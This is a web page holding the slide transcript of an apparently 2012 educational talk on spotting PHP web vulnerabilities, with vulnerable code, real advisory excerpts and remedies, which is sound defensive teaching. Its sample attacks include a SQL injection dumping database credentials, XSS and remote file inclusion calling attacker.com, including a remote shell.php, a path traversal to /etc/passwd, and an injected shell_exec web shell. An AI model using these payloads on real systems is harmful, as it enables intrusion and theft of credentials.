SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Varnish, the high performance valhalla?
Varnish, the high performance valhalla?Varnish, the high performance valhalla?
Varnish, the high performance valhalla?
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
 
Doctrine and NoSQL
Doctrine and NoSQLDoctrine and NoSQL
Doctrine and NoSQL
 
Intro to php
Intro to phpIntro to php
Intro to php
 
Quebec pdo
Quebec pdoQuebec pdo
Quebec pdo
 
Doctrine for NoSQL
Doctrine for NoSQLDoctrine for NoSQL
Doctrine for NoSQL
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
PHP Data Objects
PHP Data ObjectsPHP Data Objects
PHP Data Objects
 
veracruz
veracruzveracruz
veracruz
 
veracruz
veracruzveracruz
veracruz
 
veracruz
veracruzveracruz
veracruz
 

Mais de Miroslav Stampar

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"Miroslav Stampar
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseMiroslav Stampar
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureMiroslav Stampar
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsMiroslav Stampar
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksMiroslav Stampar
 

Mais de Miroslav Stampar (9)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & Tricks
 

Último

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 

Último (20)

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 

Spot the Web Vulnerability

  • 1. Spot the Web Vulnerability Miroslav Štampar (dev@sqlmap.org)
  • 2. Talk overview  Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s))  Usage of code review on real-life vulnerabilities as an educational tool  Mitigation in form of remedies  Note: While given examples will discuss PHP coding (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language October 13th, 2012 2
  • 3. Vulnerability statistics (1) October 13th, 2012 3
  • 4. Vulnerability statistics (2) Name Visits Platform Date vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability 31961 php 2010-08-29 WordPress <= 3.3.1 Multiple Vulnerabilities 25960 php 2012-01-25 WordPress 3.1.3 SQL Injection Vulnerabilities 25168 php 2011-07-01 Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection 24166 php 2011-07-21 Vulnerability 0-day vBulletin(R) 3.8.6 faq.php Information Disclosure 22850 php 2010-07-24 Vulnerability vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection 19074 php 2011-05-23 Vulnerability Bypass the JQuery-Real-Person captcha plugin 0-day 17089 php 2011-11-28 FCKeditor all version Arbitrary File Upload Vulnerability 16211 php 2011-08-09 Joomla 1.5 URL Redirecting Vulnerability 16061 php 2010-08-24 WordPress TimThumb Plugin - Remote Code Execution 15991 php 2011-08-03 October 13th, 2012 4
  • 5. SQL injection (1)  Vulnerability on dynamic database queries that include unfiltered user supplied input  Usually result of concatenation of raw parameter values to a desired SQL statement  Various techniques used depending on target's environment and affected vulnerable query  The goal is unauthorized access to the underlying database  Involved in 60% of all breach incidents examined by 7Safe in 2010 October 13th, 2012 5
  • 6. SQL injection (2)  Example of vulnerable code (vuln.php): <?php ... $sql = "SELECT * FROM forum_logs WHERE id = " . $_GET["id"]; $result = mysql_query($sql); ... ?>  Sample attack: http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user-- October 13th, 2012 6
  • 7. Cross-site scripting (1)  Enables attackers to inject client-side script into web pages viewed by other users  Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible  Persistent (stored) and non-persistent (reflected) variants  Samy (JS.Spacehero), first known XSS worm, infected over 1 million MySpace profiles in less than 20 hours October 13th, 2012 7
  • 8. Cross-site scripting (2)  Example of vulnerable code (vuln.php): <?php $name = $_GET['name']; echo "Welcome $name<br>"; echo "<a href="http://www.site.com/">Click to Visit</a>"; ?>  Sample attack: http://www.target.com/vuln.php? name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href ="http://www.attacker.com/";}</script> October 13th, 2012 8
  • 9. File inclusion (1)  Allows inclusion of arbitrary code into vulnerable application for further execution  Local file (LFI) and remote file (RFI) variants  Attacker's fondest wish (especially RFI)  Access anything that the original program context is able to (configuration files, password files, etc.)  Involved in 21% of all web application attacks observed by Imperva in 2011 October 13th, 2012 9
  • 10. File inclusion (2)  Example of vulnerable code (vuln.php): <?php $page = 'index'; if (isset($_REQUEST['page'])) $page = $_REQUEST['page']; include($page . '.php'); ?>  Sample attack: http://www.target.com/vuln.php? page=http://www.attacker.com/shell.php?foo= October 13th, 2012 10
  • 11. File disclosure (1)  Access files that are not intended to be accessible and expose their content to the attackers  Directory traversal variant in cases when characters for traverse to the parent directory (e.g. ../) are passed through to the file API(s)  Local file inclusion becomes a variant too if used for obtaining a non-script content  Easiest for exploitation October 13th, 2012 11
  • 12. File disclosure (2)  Example of vulnerable code (vuln.php): <?php $template = 'default.php'; if (isset($_COOKIE['template'])) $template = $_COOKIE['template']; readfile("templates/" . $template); ?>  Sample attack: GET /vuln.php HTTP/1.0 Cookie: template= ../../../../../../../../../etc/passwd October 13th, 2012 12
  • 13. Remote code execution (1)  Provides a way to execute arbitrary code  In one variant provided code is being executed inside the vulnerable web application (e.g. eval)  In other, more common, content of one of request parameters is being written to the browser reachable file, giving attacker opportunity to run it as a standalone script  TimThumb WordPress PHP plugin vulnerability (CVE: 2011-4106) affected 1.2 million websites October 13th, 2012 13
  • 14. Remote code execution (2)  Example of vulnerable code (vuln.php): <?php $fp = fopen("prefs/timezone.php", "w"); fwrite($fp, "<?phprn$timezone=" . $_REQUEST['tz'] . ";rn?>"); fclose($fp); ?>  Sample attack: http://www.target.com/vuln.php? tz=us;shell_exec($_GET['cmd']) http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd October 13th, 2012 14
  • 15. Spot SQL injection (1) (EDB-ID: 18820, CVE: 2012-1002, if (isset($_POST['authornum']) && ctype_digit($_POST['authornum'])) { OpenConf <= 4.11 OSVDB-ID: 78996) $oc_authorNum = $_POST['authornum']; } else { $anr = ocsql_query("SELECT * FROM `" . OCC_TABLE_PAPER . "` WHERE `paperid`=" . safeSQLstr($_POST['pid'])) or err("Unable to retrieve submission information"); if (mysql_num_rows($anr) != 1) { err(oc_('Submission ID or password entered is incorrect')); } October 13th, 2012 15
  • 16. Spot SQL injection (2) (EDB-ID: 19264, OSVDB-ID: 83231) if(empty($cookies['language'])){ setcookie('MyTickets_language', MyTickets <= v2.0.8 $setting['default_language'],time()+86400,"/"); $language = $setting['default_language']; } else { if($db->count('languages',"`id`='". $cookies['language']."'") == 0){ $language = $setting['default_language']; } $language = $cookies['language']; } $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'")); October 13th, 2012 16
  • 17. WP-Predict Plugin for WordPress <= v1.0 Spot SQL injection (3) foreach ($postPredicts as $postPredict){ (EDB-ID: 19715, OSVDB-ID: 83697) ... if ($_POST['postAction'] == "submitVote" && intval($_POST['predictId']) == $postPredict- >predictId) { $submitPredictId = $_POST['predictId']; $selectedOption = $_POST['predictSelection']; ... $dbResult = @$wpdb->query("INSERT INTO " . $wpdb->prefix . "wpp_predict_votes (predictEntryId, predictUserId, predictSelectedOption) VALUES (" . $submitPredictId . ", " . $user_ID . ", " . $selectedOption . ")"); ... } October 13th, 2012 17
  • 18. Spot SQL injection (4) (EDB-ID: 18516, OSVDB-ID: 79497) $start['year'] = isset($_GET['sy']) ? phpDenora <= v1.4.6 htmlspecialchars($_GET['sy']) : date('Y'); $start['month'] = isset($_GET['sm']) ? htmlspecialchars($_GET['sm']) : date('m'); $start['day'] = isset($_GET['sd']) ? htmlspecialchars($_GET['sd']) : date('d'); ... $sidq = sql_query("SELECT `id` FROM $table WHERE year = '".$start['year']."' AND month = '". $start['month']."' AND day = '".$start['day']."'"); October 13th, 2012 18
  • 19. AdRotate Plugin for WordPress <= v3.6.6 Spot SQL injection (5) (EDB-ID: 18114, CVE: 2011-4671, if(isset($_GET['track']) OR $_GET['track'] != '') { OSVDB-ID: 77507) $meta = base64_decode($_GET['track']); ... list($ad, $group, $block) = explode("-", $meta); ... $bannerurl = $wpdb->get_var($wpdb- >prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); ... } October 13th, 2012 19
  • 20. WP Bannerize Plugin for WordPress <= v2.8.7 Spot SQL injection (6) (EDB-ID: 17906, OSVDB-ID: 76658) if (@isset($_SERVER['HTTP_X_REQUESTED_WITH'])) { ... $limit = intval($_POST['limit']); $page_offset = (intval($_POST['offset']) - 1) * $limit; foreach($_POST["item"] as $key => $value){ $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset), $value); $result = mysql_query($sql); } } October 13th, 2012 20
  • 21. Spot cross-site scripting (1) (EDB-ID: 11017, OSVDB-ID: 61594) PHPDug <= v2.0.0 $page = new HtmlTemplate("templates/" . $config['tpl_name'] . "/index.html"); ... $page->SetParameter('UPCOMING_LINK', $config['site_url'].'upcoming.php?id='.$_GET['id']); $page->SetParameter('POPULAR_LINK', $config['site_url'].'index.php'); ... $page->CreatePageEcho($lang,$config); October 13th, 2012 21
  • 22. Spot cross-site scripting (2) function _wp_comment_row($comment_id, $mode, (EDB-ID: 9250, CVE: 2009-2851, $comment_status, $checkbox = true, $from_ajax = WordPress <= v2.8.1 false) { OSVDB-ID: 56193) $comment = get_comment($comment_id); ... $author_url = get_comment_author_url(); ... $author_url_display = $author_url; ... echo "<a title='$author_url' href= '$author_url'>$author_url_display</a><br/>"; ... } ... foreach ($comments as $comment) _wp_comment_row($comment->comment_ID, $mode, $comment_status); October 13th, 2012 22
  • 23. Spot cross-site scripting (3) damianov.net Shoutbox <= v1.0 $handle = fopen($shoutsFile,"a"); $toWrite="n".stripslashes($_POST["txtNick"]) . "|" . $_POST["txtEmail"] . "|" . stripslashes($_POST["txtShout"]); (EDB-ID: 12593) fwrite($handle, $toWrite); fclose($handle); ... $lines = array_reverse(file($shoutsFile)); foreach ($lines as $line_num => $line) { $info = explode("|", $line, 3); if ((is_email($info[1])) && $displayEmails) $info[0] = "<a href='mailto:" . $info[1] . "'>" . $info[0] . "</a>"; echo "<div style='$fontStyle'><b>$info[0]</b> : " . ($allowHTML ? $info[2] : strip_tags($info[2])) . "</div>n"; // CVE-2004-0595 (strip_tags() bypass) } October 13th, 2012 23
  • 24. Spot file inclusion (1) (EDB-ID: 15166, OSVDB-ID: 68300) Zen Cart <= v1.3.9f $typefilter = 'default'; if (isset($_GET['typefilter'])) $typefilter = $_GET['typefilter']; require(DIR_WS_INCLUDES . zen_get_index_filters_directory($typefilter . '_filter.php')); October 13th, 2012 24
  • 25. Spot file inclusion (2) (EDB-ID: 19550, OSVDB-ID: 83700) if (isset($_POST['lang']) && preg_replace("#.*/#","", phpMyBackupPro <= v2.2 $_SERVER['PHP_SELF'])=="config.php" $CONF['lang']=$_POST['lang']; if (!isset($CONF['lang'])) $CONF['lang']="english"; if (!file_exists($prepath.PMBP_LANGUAGE_DIR. $CONF['lang'].".inc.php")) include_once($prepath.PMBP_LANGUAGE_DIR . "english.inc.php"); else include($prepath.PMBP_LANGUAGE_DIR . $CONF['lang'].".inc.php"); October 13th, 2012 25
  • 26. Relocate Upload Plugin for WordPress <= Spot file inclusion (3) (EDB-ID: 17869, CVE: 2012-1205, OSVDB-ID: 79250) if (isset($_GET['ru_folder'])) { v0.14 define('WP_USE_THEMES', false); require_once(urldecode($_GET['abspath']) . '/wp-load.php'); ... } October 13th, 2012 26
  • 27. Spot file disclosure (1) ISPworker <= v1.23 (EDB-ID: 10262) header('Content-type: ' . $_REQUEST[type]); header('Content-Disposition: attachment; filename="' . $_REQUEST[filename] . '"'); readfile("./tmp/$ticketid" . "_" . $_REQUEST[filename]); October 13th, 2012 27
  • 28. PICA Photo Gallery Plugin for WordPress <= Spot file disclosure (2) (EDB-ID: 19016, OSVDB-ID: 82702) $timg = $imgname = $_REQUEST['imgname']; $pluginName = 'pica-photo-gallery'; $file = dirname(dirname(dirname(__FILE__))) . "/uploads/" . $pluginName . "/" . $timg; header('Content-Description: File Transfer'); v1.0 header('Content-Type: application/octet-stream'); ... header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); October 13th, 2012 28
  • 29. Spot remote code execution (1) (EDB-ID: 18775, CVE: 2012-1495, $file = '../includes/settings.php'; ... WebCalendar <= v1.2.4 $settings['single_user_login'] = getPostValue OSVDB-ID: 81329) ('form_single_user_login'); ... $fd = @fopen ($file, 'w+b', false); ... fwrite ($fd, "<?phprn"); fwrite ($fd, '/* updated via install/index.php on ' . date ('r') . "rn"); foreach ($settings as $k => $v) { if ($v != '<br />' && $v != '') fwrite ($fd, $k . ': ' . $v . "rn"); } October 13th, 2012 29
  • 30. Spot remote code execution (2) Ajax File and Image Manager <= v1.0 (EDB-ID: 18075, CVE: 2011-4825, @ob_start(); displayArray($_POST); writeInfo(@ob_get_clean()); OSVDB-ID: 76928) ... function writeInfo($data, $die = false) { $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+'); @fwrite($fp, $data); @fwrite($fp, "nn" . date('d/M/Y H:i:s')); @fclose($fp); ... } October 13th, 2012 30
  • 31. Remedies (1)  Data validation Process of ensuring that application is running with correct data Discard if it doesn’t pass the validation process if (!preg_match('/^(?d{3})?[-s.]?d{3}[-s.]d{4}$/', $phone)) { echo "Your phone number is invalid"; die(); } October 13th, 2012 31
  • 32. Remedies (2)  Data sanitization Removing any unwanted bits from the data and normalizing it to the correct form $comment = strip_tags($_POST['comment']); ... $id = intval($_GET['id']); ... $username = preg_replace('/[^a-zA-Z0-9._]/', '', $_REQUEST['username']); ... $query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'", mysql_real_escape_string($user), mysql_real_escape_string($password)); October 13th, 2012 32
  • 33. Remedies (3)  Output escaping Protecting integrity of displayed data Prevents browser from applying any unintended meaning to any special sequence of characters that may be found Always escape output provided by users! echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES); October 13th, 2012 33
  • 34. Remedies (4)  Safe communication with a database Prepared statements use one channel for commands and another one for data (which never allows commands) $db = new PDO('dblib:host=localhost; dbname=testdb; charset=UTF-8', $user, $pass); $query = 'SELECT * FROM users WHERE id = :id'; $stmt = $db->prepare($query); $stmt->bindValue(':id', $_REQUEST['id']); $stmt->execute(); while($row = $stmt->fetch(PDO::FETCH_ASSOC)) { ... October 13th, 2012 34
  • 35. Questions? October 13th, 2012 35